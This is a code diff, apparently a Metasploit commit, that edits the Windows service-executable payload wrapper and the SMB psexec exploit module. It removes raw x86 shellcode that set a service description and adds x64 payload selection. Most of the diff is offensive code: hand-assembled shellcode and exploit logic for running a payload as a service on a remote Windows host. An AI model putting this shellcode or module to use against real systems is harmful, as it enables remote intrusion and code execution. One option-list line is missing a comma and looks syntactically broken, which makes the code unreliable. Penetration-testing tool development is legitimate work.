SERVICE_DESCRIPTION doesn't concern this PR

Florian Gaultier · agix · commit 808f87d213de · 2014-05-13T16:04:39.000+02:00
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -539,20 +539,6 @@ def self.to_win32pe_service(framework, code, opts={})
         "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
         "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
 
-      code_service_description = ""
-
-      if opts[:servicedescription]
-        pushed_service_description = string_to_pushes(opts[:servicedescription])
-
-        code_service_description = 
-          "\x68\x3F\x00\x0F\x00\x6A\x00\x6A\x00\x68\x67\xF0\x36" +
-          "\x76\xFF\xD5\x89\xC7"+pushed_service_name+"\x89\xE1\x68" +
-          "\xFF\x01\x0F\x00\x51\x50\x68\x56\x28\x4B\x40\xFF\xD5\x89\xC6" +
-           pushed_service_description+"\x89\xE1\x6A\x00\x51\x89\xE1\x51" +
-          "\x6A\x01\x50\x68\x87\xB0\x35\xED\xFF\xD5\x56\x68\xDE\xEA\x77" +
-          "\xAD\xFF\xD5\x57\x68\xDE\xEA\x77\xAD\xFF\xD5"
-      end
-
       precode_size = 0x42
       shellcode_code_offset = code_service_stopped.length + precode_size
 
@@ -575,8 +561,7 @@ def self.to_win32pe_service(framework, code, opts={})
          [hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
         "\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
         "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
-        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" +
-         code_service_description+"\x31\xFF\x6A" +
+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
         "\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
         "\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
         "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
@@ -83,8 +83,7 @@ def initialize(info = {})
         OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
         OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
         OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
-        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil]),
-        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+        OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
       ], self.class)
   end
 
@@ -155,7 +154,7 @@ def exploit
       # Disconnect from the ADMIN$
       simple.disconnect("ADMIN$")
     else
-      servicename = datastore['SERVICE_NAME'] || "#{rand_text_alpha(8)}"
+      servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
       servicedescription = datastore['SERVICE_DESCRIPTION'] || rand_text_alpha(rand(32)+1)
       displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
 
@@ -180,6 +179,9 @@ def exploit
       end
       exe = ''
       opts = { :servicename => servicename }
+      if (datastore['PAYLOAD'].include? 'x64')
+        opts.merge!({ :arch => ARCH_X64 })
+      end
       exe = generate_payload_exe_service(opts)
 
       fd << exe
